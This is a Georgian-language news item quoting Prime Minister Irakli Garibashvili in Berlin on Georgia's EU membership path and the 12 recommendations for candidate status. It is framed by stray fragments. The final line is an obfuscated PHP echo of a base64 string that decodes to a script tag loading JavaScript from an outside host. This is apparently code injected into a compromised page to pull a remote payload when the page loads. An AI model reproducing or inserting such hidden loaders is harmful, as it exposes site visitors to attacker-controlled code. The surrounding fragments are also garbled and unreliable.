celsiusi
ავერსი საქკაბელი
პრემიერმინისტრ ირაკლი ღარიბაშვილის მტკიცებით, საქართველოს მთავრობა მაქსიმუმს აკეთებს, რომ ქვეყანა ევროკავშირის წევრი, რაც შეიძლება მალე გახდეს. განცხადება ღარიბაშვილმა ბერლინში გერმანიის კანცლერთან ერთად გამართულ ბრიფინგზე გააკეთა.
 
პრესკონფერენციაზე ჟურნალისტმა მას ჰკითხა, როგორ უყურებს საქართველოს ევროკავშირში გაწევრიანების დროის პერსპექტივას და ფიქრობს თუ არა, რომ საქართველო EU-ს წევრი მომდევნო 10 წელიწადში გახდება.
 
ღარიბაშვილმა თქვა, რომ საქართველოს ხელისუფლებას კარგად ესმის, რომ ევროკავშირში გაწევრიანების პროცესის დაჩქარება შეუძლებელია.
 
"ეს არ არის დამოკიდებული მხოლოდ სურვილზე. ეს არის პროცესი, რომელსაც ჩვენ ყველანი, მაქსიმალური პასუხისმგებლობით მივყვებით. ჩვენ გვესმის, რომ ამის დაჩქარება შეუძლებელია, არის გარკვეული კრიტერიუმები, რომლებიც ჩვენ უნდა შევასრულოთ. ეს არის მზადება იმ დღისთვის, როცა ქვეყანა გახდება ევროკავშირის წევრი.
 
ჩვენ გვაქვს კონკრეტული გეგმა, როგორ მოვახდინოთ ჩვენი ქვეყნის მოდერნიზაცია, გარდაქმნა, რეფორმების ჩატარება. სწორედ ამას უკავშირდება ის 12 რეკომენდაციის შესრულება, რომელიც მოგვცემს საშუალებას, რომ მივიღოთ ევროპული კანდიდატის სტატუსი, შესაბამისად ჩვენ, რა თქმა უნდა, გავაკეთებთ მაქსიმუმს, იმისთვის რომ რაც შეიძლება მალე იქნას ეს მიღწეული, ესაა ჩვენი გეგმა, რომელიც ჩვენი ხალხის სურვილებს და გეგმას გამოხატავს", - თქვა ირაკლი ღარიბაშვილმა.
415
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");